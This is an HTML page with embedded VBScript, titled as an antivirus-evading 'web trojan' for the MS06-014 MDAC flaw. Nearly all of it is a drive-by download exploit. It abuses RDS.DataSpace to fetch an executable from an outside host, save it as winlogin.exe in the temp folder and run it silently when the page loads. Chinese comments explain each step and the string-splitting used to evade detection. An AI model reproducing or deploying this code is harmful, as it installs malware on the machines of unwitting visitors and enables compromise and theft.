<
html
>
?
<
script?
language
="VBScript"
>
????
on
?
error
?
resume
?
next
????
'
即將下載的木馬
????dl?
=
"
ht#tp://ww#w.800vv.com/cc/cj.exe#
"
????
'
創建OBJECT元素
????
Set
?df?
=
?document.createElement(
"
object
"
)
????
'
指定OBJECT為RDS.DataSpace?
????????
'
該對象有一個方法名為CreateObject,
????????
'
helpstring("Creates?a?business?object?of?the?specified?Progid?over?the?specified?connection")
????df.setAttribute?
"
classid
"
,?
"
clsid:BD96C556-65A3-11D#0-983A-00C04F#C29E36
"
????
'
????str
=
"
Microsoft.XMLHTTP
"
????
'
RDS.DataSpace.CreateObject("Microsoft.XMLHTTP","")
????
Set
?x?
=
?df.CreateObject(str,
""
)
????
'
4545
????a1
=
"
A#do
"
????a2
=
"
db.
"
????a3
=
"
Str
"
????a4
=
"
eam
"
????
'
str5?=?"Adodb.Stream"?分成這么多段是為了掩人耳目
????str1
=
a1
&
a2
&
a3
&
a4
????str5
=
str1
????
'
RDS.DataSpace.CreateObject("Ado#db.Str#eam","")
????
set
?S?
=
?df.createobject(str5,
""
)
????
'
5455
????S.type?
=
?
1
????str6
=
"
GET
"
????
'
Microsoft.XMLHTTP.Open?"GET"?"ht#tp://ww#w.800vv.com/cc/cj.exe#"?False
????????
'
下載木馬
????x.Open?str6,?dl,?
False
????x.Send
????
'
本地文件名
????fname1
=
"
winlogin.exe
"
????
'
888
????
set
?F?
=
?df.createobject(
"
Scri#pting.FileSy#stemObject
"
,
""
)
????
'
獲取臨時目錄
????
set
?tmp?
=
?F.GetSpecialFolder(
2
)?
????
'
創建本地文件
????fname1
=
?F.BuildPath(tmp,fname1)
????
'
Adodb.Stream.open
????S.open
????
'
Adodb.Stream.write?木馬代碼
????S.write?x.responseBody
????
'
Adodb.Stream.savetofile?"臨時目錄\winlogin.exe"
????S.savetofile?fname1,
2
????
'
6551
????S.close
????
'
458
????
set
?Q?
=
?df.createobject(
"
Shell.Application
"
,
""
)
????
'
運行?臨時目錄\winlogin.exe
????Q.ShellExecute?fname1,
""
,
""
????
'
55
????
</
script
>
????
<
head
>
????
<
title
>
icexiaoyeMS06-014免殺網馬
</
title
>
????
</
head
><
body
>
????
<
center
>
icexiaoyeMS06-014免殺網馬
</
center
>
????
</
body
>
<
script?
type
="text/jscript"
>
function
?init()?
{?
document.write(Date());
}
window.onload?
=
?init;
</
script
>
</
html
>
一般來說,script是無法寫本地文件的。。這段代碼利用了Microsoft Data Access Components (MDAC)的一個安全漏洞來寫本地文件。